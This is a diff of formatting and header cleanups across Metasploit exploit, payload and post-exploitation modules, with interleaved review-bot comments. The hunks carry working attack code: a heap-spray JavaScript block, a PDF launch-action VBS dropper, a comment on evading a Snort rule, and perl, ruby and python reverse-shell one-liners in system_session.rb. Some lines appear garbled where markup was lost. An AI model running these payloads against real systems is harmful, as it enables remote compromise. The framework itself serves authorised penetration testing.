@@ -291,7 +291,7 @@ else {
- |
+EOS
end
diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb
index e319b5b2e8..e17fd622bd 100644
--- a/modules/exploits/windows/browser/mozilla_mchannel.rb
+++ b/modules/exploits/windows/browser/mozilla_mchannel.rb
@@ -95,9 +95,9 @@ class Metasploit3 < Msf::Exploit::Remote
))
end
- def junk
- return rand_text_alpha(4).unpack("L")[0].to_i
- end
+ def junk
+ return rand_text_alpha(4).unpack("L")[0].to_i
+ end
def on_request_uri(cli, request)
diff --git a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb
index a3d8fe5d22..6bb3bce634 100644
--- a/modules/exploits/windows/browser/ms08_078_xml_corruption.rb
+++ b/modules/exploits/windows/browser/ms08_078_xml_corruption.rb
@@ -115,7 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
- html = %Q|
+ html = <<-EOS
+
-
-
- EOF
+ content = <<-EOS
+
+
+
+
+
+
+EOS
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')
diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb
index 9d59cb8c9b..dc7058e5fe 100644
--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
# twitter.com/net__ninja
'mr_me
', # initial discovery/msf module
'sinn3r', #Auto target, obfuscation, lots of testing
- ],
+ ],
'Version' => '$Revision$',
'References' =>
[
@@ -148,30 +148,30 @@ class Metasploit3 < Msf::Exploit::Remote
main_sym = 'main' #main function name
if my_target.name =~ /IE6/ or my_target.name =~ /IE7/
- js = <<-EOF
- var sc = unescape('#{sc}');
+ js = <<-EOS
+var sc = unescape('#{sc}');
- var nops = unescape('%u0c0c%u0c0c');
- var offset = 20;
- var s = offset + sc.length;
- while(nops.length < s) {
- nops += nops;
- }
- var chunk1 = nops.substring(0, s);
- var chunk2 = nops.substring(0, nops.length - s);
- while((chunk2.length + s) < 0x50000) {
- chunk2 = chunk2 + chunk2 + chunk1;
- }
- var blocks = new Array();
- for(var counter=0; counter<200; counter++){
- blocks[counter] = chunk2 + sc;
- }
+var nops = unescape('%u0c0c%u0c0c');
+var offset = 20;
+var s = offset + sc.length;
+while(nops.length < s) {
+ nops += nops;
+}
+var chunk1 = nops.substring(0, s);
+var chunk2 = nops.substring(0, nops.length - s);
+while((chunk2.length + s) < 0x50000) {
+ chunk2 = chunk2 + chunk2 + chunk1;
+}
+var blocks = new Array();
+for(var counter=0; counter<200; counter++){
+ blocks[counter] = chunk2 + sc;
+}
- function main()
- {
- #{obj_name}.AddSeries(#{my_target.ret});
- }
- EOF
+function main()
+{
+ #{obj_name}.AddSeries(#{my_target.ret});
+}
+EOS
end
#http://vreugdenhilresearch.nl/Pwn2Own-2010-Windows7-InternetExplorer8.pdf
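Review bot: The JavaScript body of the `js` heredoc now sits flush-left inside an indented Ruby method, because `<<-EOS` only lets the terminator be indented and does not strip body indentation; the previous `<<-EOF` form kept the body indented at the cost of emitting that leading whitespace into the served page. If the framework's supported Ruby permits `<<~EOS` (2.3+), that keeps the source readable while stripping the common indent; otherwise a short comment such as `# body is flush-left on purpose: <<- does not strip indentation` would stop the next reader from re-indenting it. The `if my_target.name =~ /IE6/ ...` branch and the enclosing method continue outside the hunk.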
diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
index 46a15b3073..4ab6491b54 100644
--- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
+++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
@@ -372,8 +372,9 @@ class Metasploit3 < Msf::Exploit::Remote
def create_email_body_html(body, subject)
body = body.gsub(/\\[nr]/, "
\n")
body = body.gsub(/\\t/, " ")
- body = "\n\n\n\n" << subject << "\n\n\n" << body << "\n
\n\n"
- return body
+ ret = "\n\n\n\n"
+ ret << "" << subject << "\n\n\n" << body << "\n
\n\n"
+ ret
end
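Review bot: `ret << "" << subject` on the new side appends an empty literal, which is a no-op unless markup was lost when this page was rendered; if the string really is empty, drop it (`ret << subject << "\n\n\n" << body`), and if it was a tag, restore it before merging. A one-line comment on `body.gsub(/\\[nr]/, ...)` noting that it rewrites the literal two-character sequences `\n`/`\r` found in the option text, not actual line breaks, would help, since the regex reads as though it matched newlines.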
def create_tnef_exploit
diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb
index 0c7dfc6f2d..13abefbcf0 100644
--- a/modules/exploits/windows/fileformat/adobe_libtiff.rb
+++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb
@@ -324,7 +324,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
def make_xml(tiff_data)
- xml_data = %Q|
+ xml_data = <<-EOS
+
@@ -383,7 +384,7 @@ class Metasploit3 < Msf::Exploit::Remote
-|
+EOS
xml_data.gsub!(/REPLACE_TIFF/, tiff_data)
xml_data
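Review bot: `xml_data.gsub!(/REPLACE_TIFF/, tiff_data)` passes `tiff_data` as a replacement string, where backslash sequences such as `\\0`, `\\&` and `\\1` are interpreted rather than inserted literally; the line is unchanged by this commit but now sits directly under the heredoc it rewrites. If `tiff_data` can ever contain a backslash, the block form `xml_data.gsub!(/REPLACE_TIFF/) { tiff_data }` inserts it verbatim. `make_xml` starts in the previous hunk.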
diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
index 765199bdc6..207efa9889 100644
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
@@ -108,8 +108,8 @@ class Metasploit3 < Msf::Exploit::Remote
output = String.new()
output << "#{obj_num.to_i + 1} 0 obj\r<>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r"
- output << "#{obj_num.to_i + 2} 0 obj\r<>>>>stream\r#{stream}\r\nendstream\rendobj\r"
-
+ output << "#{obj_num.to_i + 2} 0 obj\r<>>>>"
+ output << "stream\r#{stream}\r\nendstream\rendobj\r"
return output
end
diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
index 9a08f08c92..78e1e2e984 100644
--- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
+++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
@@ -152,7 +152,8 @@ class Metasploit3 < Msf::Exploit::Remote
xref << pdf.length
pdf << ioDef(5) << nObfu("< 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\#{exe_name} && del /F 1.vbs"
pdf << eol << eol << eol << "#{launch_msg})"
pdf << ">>>>" << endobj
diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb
index edd7ff41c5..37c7abfffb 100644
--- a/modules/exploits/windows/fileformat/deepburner_path.rb
+++ b/modules/exploits/windows/fileformat/deepburner_path.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
- template = <<-EOF
+ template = <<-EOS
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
-EOF
+EOS
seh_offset = 272
path = make_nops(seh_offset)
diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
old mode 100755
new mode 100644
diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
index aba9f1f36d..cfc90c64fa 100644
--- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
+++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb
@@ -49,8 +49,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.exploit-db.com/exploits/8180' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12059/' ],
],
- 'Platform' => [ 'win' ],
- 'Payload' =>
+ 'Platform' => [ 'win' ],
+ 'Payload' =>
{
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
},
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
- [
+ [
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
OptString.new('USERNAME', [ true, 'Username', ''])
], self.class)
@@ -83,10 +83,10 @@ class Metasploit3 < Msf::Exploit::Remote
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)
[ 'x86/alpha_mixed'].each { |name|
- enc = framework.encoders.create(name)
- if name =~/alpha/
- enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
- end
+ enc = framework.encoders.create(name)
+ if name =~/alpha/
+ enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
+ end
hunter = enc.encode(hunter, nil, nil, platform)
}
diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
index 904f2ec955..c6b39275a8 100644
--- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
@@ -106,5 +106,5 @@ createDataObject\('#{path_new + decoder_file + '.bat'}', unescape\(\"#{decoder}\
decoder.gsub!(/decode_stub/, "C:/Windows/Temp/" + decoder_file + '.vbs')
return decoder = Rex::Text.uri_encode(decoder)
- end
+ end
end
diff --git a/modules/exploits/windows/fileformat/scadaphone_zip.rb b/modules/exploits/windows/fileformat/scadaphone_zip.rb
index 74a4eebbbc..158f1c3dab 100644
--- a/modules/exploits/windows/fileformat/scadaphone_zip.rb
+++ b/modules/exploits/windows/fileformat/scadaphone_zip.rb
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://www.scadatec.com/' ],
[ 'URL', 'http://www.exploit-db.com/exploits/17817/' ],
],
- 'Platform' => [ 'win' ],
- 'Payload' =>
+ 'Platform' => [ 'win' ],
+ 'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d",
@@ -59,10 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
- [
- OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
- ], self.class)
-
+ [
+ OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
+ ], self.class)
end
def exploit
diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb
index 6af49766f3..fef83c5f34 100644
--- a/modules/exploits/windows/http/hp_nnm_ovas.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovas.rb
@@ -9,11 +9,11 @@
# http://metasploit.com/framework/
##
-##
+=begin
# This should bypass the following snort rule referenced from web-misc.rules (10/17/2008)
# alert tcp $EXTERNAL_NET any -> $HOME_NET 7510 (msg:"WEB-MISC HP OpenView Network Node Manager HTTP handling buffer overflow attempt"; flow:to_server,established; content:"GET "; depth:4; nocase; isdataat:165,relative; content:"/topology/homeBaseView"; pcre:"/GET\s+\w[^\x0a\x20]{165}/i"; metadata:policy balanced-ips drop, policy security-ips drop; reference:bugtraq,28569; reference:cve,2008-1697; classtype:attempted-admin; sid:13715; rev:3;)
# Newer versions of this rule might find this but we've taken steps to atleast bypass this rule
-##
+=end
require 'msf/core'
@@ -94,7 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
Opt::RPORT(7510),
- OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
+ OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request",
+ 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N' ])
], self.class)
end
diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb
index 60dec780e5..26fb75f5d4 100644
--- a/modules/exploits/windows/http/hp_power_manager_filename.rb
+++ b/modules/exploits/windows/http/hp_power_manager_filename.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
which may result aribitrary remote code execution under the context of 'SYSTEM'.
},
'License' => MSF_LICENSE,
- 'Author' =>
+ 'Author' =>
[
# Original discovery (Secunia Research)
'Alin Rad Pop',
diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb
index 8e94cdce9f..4f7025640d 100644
--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -117,6 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
+
__END__
else if (strcmp($type, "Job") == 0)
{
diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb
index 5bc3a7c21d..f605077d09 100644
--- a/modules/exploits/windows/misc/wireshark_packet_dect.rb
+++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb
@@ -166,9 +166,8 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending malicious packet")
open_pcap()
-
- #handler
+ #handler
if datastore['LOOP']
while true
break if session_created? and datastore['ExitOnSession']
diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb
old mode 100755
new mode 100644
index c750ba303b..9f5708f315
--- a/modules/payloads/singles/linux/armle/adduser.rb
+++ b/modules/payloads/singles/linux/armle/adduser.rb
@@ -1,3 +1,7 @@
+##
+# $Id$
+##
+
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb
index 3f32ace328..004f5b0b13 100644
--- a/modules/payloads/singles/linux/x64/exec.rb
+++ b/modules/payloads/singles/linux/x64/exec.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
module Metasploit3
diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
index bb43d07c12..87abc8d704 100644
--- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
index fdc98a33ec..b5c4bfc05d 100644
--- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb
index e4b5dabd80..6c400da7f4 100644
--- a/modules/payloads/singles/windows/exec.rb
+++ b/modules/payloads/singles/windows/exec.rb
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/exec'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Windows::Exec
end
diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb
index 7240378021..d306a93937 100644
--- a/modules/payloads/singles/windows/loadlibrary.rb
+++ b/modules/payloads/singles/windows/loadlibrary.rb
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/loadlibrary'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Windows::LoadLibrary
end
diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb
index fe7354800e..7b84375422 100644
--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -20,7 +20,7 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Java Reverse HTTPS Stager',
- 'Version' => '$Revision: 13402 $',
+ 'Version' => '$Revision$',
'Description' => 'Tunnel communication over HTTPS',
'Author' => [
'mihi', # all the hard work
diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb
index ee0e8285d5..fc4e3fb6dd 100644
--- a/modules/payloads/stagers/linux/x64/bind_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/core/handler/bind_tcp'
diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
index 36fb62eda0..a2be9a7899 100644
--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb
index f71eda8be5..8770ac00e4 100644
--- a/modules/payloads/stages/linux/x64/shell.rb
+++ b/modules/payloads/stages/linux/x64/shell.rb
@@ -1,3 +1,15 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb
index 47daaaf731..e001b8a48b 100644
--- a/modules/payloads/stages/osx/x86/bundleinject.rb
+++ b/modules/payloads/stages/osx/x86/bundleinject.rb
@@ -19,6 +19,7 @@ require 'msf/core/payload/osx/bundleinject'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Osx::BundleInject
end
diff --git a/modules/payloads/stages/windows/dllinject.rb b/modules/payloads/stages/windows/dllinject.rb
index 6a3b68cfcd..c181777f9e 100644
--- a/modules/payloads/stages/windows/dllinject.rb
+++ b/modules/payloads/stages/windows/dllinject.rb
@@ -21,6 +21,7 @@ require 'msf/core/payload/windows/reflectivedllinject'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Windows::ReflectiveDllInject
end
diff --git a/modules/payloads/stages/windows/patchupdllinject.rb b/modules/payloads/stages/windows/patchupdllinject.rb
index fea3e648a1..945f5e168d 100644
--- a/modules/payloads/stages/windows/patchupdllinject.rb
+++ b/modules/payloads/stages/windows/patchupdllinject.rb
@@ -19,6 +19,7 @@ require 'msf/core/payload/windows/dllinject'
###
module Metasploit3
+ # $Revision$
include Msf::Payload::Windows::DllInject
end
diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb
index 9db94f2341..2b6e0b634a 100644
--- a/modules/post/multi/gather/dns_bruteforce.rb
+++ b/modules/post/multi/gather/dns_bruteforce.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DNS Forward Lookup Bruteforce',
- 'Description' => %q{
+ 'Description' => %q{
Brute force subdomains and hostnames via wordlist.
},
'License' => MSF_LICENSE,
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
# Run Method for when run command is issued
def run
-
+
domain = datastore['DOMAIN']
hostlst = datastore['NAMELIST']
i, a = 0, []
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Post
ns_opt = " #{n.strip}.#{domain}"
cmd = "/usr/bin/host"
end
-
+
if i <= thread_num
print_status("Trying #{ns_opt}")
a.push(::Thread.new {
@@ -126,4 +126,4 @@ class Metasploit3 < Msf::Post
end
end
end
-end
\ No newline at end of file
+end
diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb
index 145dbe607b..10c29689f6 100644
--- a/modules/post/multi/gather/dns_srv_lookup.rb
+++ b/modules/post/multi/gather/dns_srv_lookup.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Multi Gather DNS Service Record Lookup Scan',
- 'Description' => %q{
+ 'Description' => %q{
Enumerates know SRV Records for a given domaon using target host DNS query tool.
},
'License' => MSF_LICENSE,
@@ -42,21 +42,21 @@ class Metasploit3 < Msf::Post
# Run Method for when run command is issued
def run
srvrcd = [
- '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
- '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
- '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.',
- '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.',
- '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.',
- '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.',
- '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.',
- '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.',
- '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.',
- '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.',
- '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.',
- '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.',
- '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.',
- '_ldap._tcp.ForestDNSZones.'
- ]
+ '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.',
+ '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.',
+ '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.',
+ '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.',
+ '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.',
+ '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.',
+ '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.',
+ '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.',
+ '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.',
+ '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.',
+ '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.',
+ '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.',
+ '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.',
+ '_ldap._tcp.ForestDNSZones.'
+ ]
domain = datastore['DOMAIN']
@@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post
ip_map[host.strip] = ip.strip
end
end
-
+
# Get SRV parameter for each record
records.each do |r|
if r =~ /svr hostname/
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Post
srv_records << rcrd
end
else
-
+
rcrd[:ip] = ip_map[rcrd[:target]]
# Report hosts found
report_host(:host => rcrd[:ip].strip, :name => rcrd[:target])
@@ -258,4 +258,4 @@ class Metasploit3 < Msf::Post
end
return srv_records
end
-end
\ No newline at end of file
+end
diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb
index 1dd5850655..0ceb73b4d5 100644
--- a/modules/post/multi/gather/ping_sweep.rb
+++ b/modules/post/multi/gather/ping_sweep.rb
@@ -49,9 +49,9 @@ class Metasploit3 < Msf::Post
numip = ipadd.num_ips
while (iplst.length < numip)
ipa = ipadd.next_ip
- if (not ipa)
- break
- end
+ if (not ipa)
+ break
+ end
iplst << ipa
end
if session.type =~ /shell/
diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb
index 4aef47414c..2b6a4177ad 100644
--- a/modules/post/multi/manage/system_session.rb
+++ b/modules/post/multi/manage/system_session.rb
@@ -43,8 +43,8 @@ class Metasploit3 < Msf::Post
[false, 'Port for Payload to connect to.', 4433]),
OptBool.new('HANDLER',
[ true, 'Start an Exploit Multi Handler to receive the connection', false]),
- OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',\
- 'auto', ['auto','ruby','python','perl','bash']])
+ OptEnum.new('TYPE', [true, 'Scripting environment on target to use for reverse shell',
+ 'auto', ['auto','ruby','python','perl','bash']])
], self.class)
end
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
lport = datastore['LPORT']
cmd = ""
case datastore['type']
- when /auto/i
+ when /auto/i
cmd = auto_create_session(lhost,lport)
when /ruby/i
cmd = ruby_session(lhost,lport)
@@ -153,8 +153,8 @@ class Metasploit3 < Msf::Post
def perl_session(lhost,lport)
if cmd_exec("perl -v") =~ /Larry/
print_status("Perl reverse shell selected")
- cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET \
-(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
+ cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " +
+ "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -166,8 +166,8 @@ class Metasploit3 < Msf::Post
def ruby_session(lhost,lport)
if cmd_exec("ruby -v") =~ /revision/i
print_status("Ruby reverse shell selected")
- return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");\
-while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
+ return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" +
+ "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -179,9 +179,9 @@ while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'
def python_session(lhost,lport)
if cmd_exec("python -V") =~ /Python 2\.(\d)/
print_status("Python reverse shell selected")
- return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,\
-socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);\
-os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
+ return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," +
+ "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" +
+ "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
else
print_error("No scripting environment found for the selected type.")
cmd =""
@@ -200,4 +200,4 @@ os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
end
return cmd
end
-end
\ No newline at end of file
+end
diff --git a/modules/post/windows/gather/arp_scanner.rb b/modules/post/windows/gather/arp_scanner.rb
index 327261fdd4..c3872e1c22 100644
--- a/modules/post/windows/gather/arp_scanner.rb
+++ b/modules/post/windows/gather/arp_scanner.rb
@@ -68,13 +68,7 @@ class Metasploit3 < Msf::Post
ip = h["return"]
h = iphlp.SendARP(ip,0,6,6)
if h["return"] == client.railgun.const("NO_ERROR")
- mac = h["pMacAddr"]
- mac_text = mac[0].ord.to_s(16) + ":" +
- mac[1].ord.to_s(16) + ":" +
- mac[2].ord.to_s(16) + ":" +
- mac[3].ord.to_s(16) + ":" +
- mac[4].ord.to_s(16) + ":" +
- mac[5].ord.to_s(16)
+ mac_text = h["pMacAddr"].unpack('C*').map { |e| "%02x" % e }.join(':')
print_status("\tIP: #{ip_text} MAC #{mac_text}")
